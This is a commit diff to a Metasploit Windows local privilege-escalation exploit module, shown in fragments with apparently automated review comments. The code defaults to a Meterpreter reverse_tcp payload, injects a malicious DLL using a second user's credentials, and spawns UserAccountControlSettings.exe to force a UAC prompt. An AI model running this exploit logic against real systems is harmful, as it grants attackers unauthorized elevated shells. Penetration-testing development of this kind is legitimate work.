Add in fix to ensure that we can spawn sessions automatically on Windows 10 20H2 and other systems where we hit a bug with UAC prompts from the exploit DLL itself not triggering the payload

Grant Willcox
2022-04-05 19:16:48 -05:00
parent 597e173b0a
commit c8c91fcaf3
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Local
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
'WfsDelay' => 30
'WfsDelay' => 300
},
'AKA' => [ 'SuperProfile' ]
}
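Review bot: The jump from 30 to 300 seconds for `WfsDelay` is not explained anywhere in the hunk, and a ten-fold increase in how long the handler waits for a session is the kind of default a later maintainer will be tempted to "fix" back. A short why-comment on the new line would pin the rationale, e.g. `'WfsDelay' => 300 # session may only arrive after the 60 s UAC-prompt fallback in exploit(), so wait well beyond that`. If the 300 was chosen for a different reason (slow consent.exe spawn on some builds, for instance), state that instead; I am inferring the link to the fallback from the commit message rather than from this hunk. The enclosing `DefaultOptions` hash starts before the hunk.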
@@ -232,6 +232,7 @@ class MetasploitModule < Msf::Exploit::Local
dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s
@session_obtained_bool = false
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation, and the credentials for the second user.
execute_dll(library_path, dll_info_parameter)
@@ -240,9 +241,23 @@ class MetasploitModule < Msf::Exploit::Local
print_warning("Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:")
print_warning('taskkill /IM "consent.exe" /F || taskkill /IM "narrator.exe" /F || taskkill /IM "narratorquickstart.exe" /F || taskkill /IM "msiexec.exe" || rmdir /q /s C:\Users\TEMP || rmdir /q /s C:\Windows\System32\Narrator.exe.local')
print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')
print_status("Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.")
print_status("If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.")
sleep(60)
if (@session_obtained_bool == false)
# Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself
# triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.
begin
cmd_exec("UserAccountControlSettings.exe")
rescue Rex::TimeoutError
print_warning("Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!")
end
end
end
def on_new_session(new_session)
@session_obtained_bool = true
old_session = @session
@session = new_session
if new_session.type == 'meterpreter'
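Review bot: The fixed `sleep(60)` never returns early even though `@session_obtained_bool` exists precisely to tell whether a session has already arrived, so users are told to CTRL+C instead, which also skips whatever cleanup the module runs after this point; replace the sleep with a poll, `60.times { break if @session_obtained_bool; sleep(1) }`, and write the guard idiomatically as `unless @session_obtained_bool` rather than `if (@session_obtained_bool == false)`. The fallback also starts `UserAccountControlSettings.exe` on the target, but the manual cleanup command printed just above only kills consent.exe, narrator.exe, narratorquickstart.exe and msiexec.exe, so that process is presumably left behind when the `Rex::TimeoutError` path is taken; consider adding it to that list if it does not exit on its own. Note as well that `@session_obtained_bool` is set from `on_new_session`, which the framework invokes on a different thread than `exploit`, so the poll above relies on a plain instance-variable write being visible across threads, which is fine under MRI's GVL but worth a one-line comment. The `exploit` method begins before this hunk and `on_new_session` continues past it.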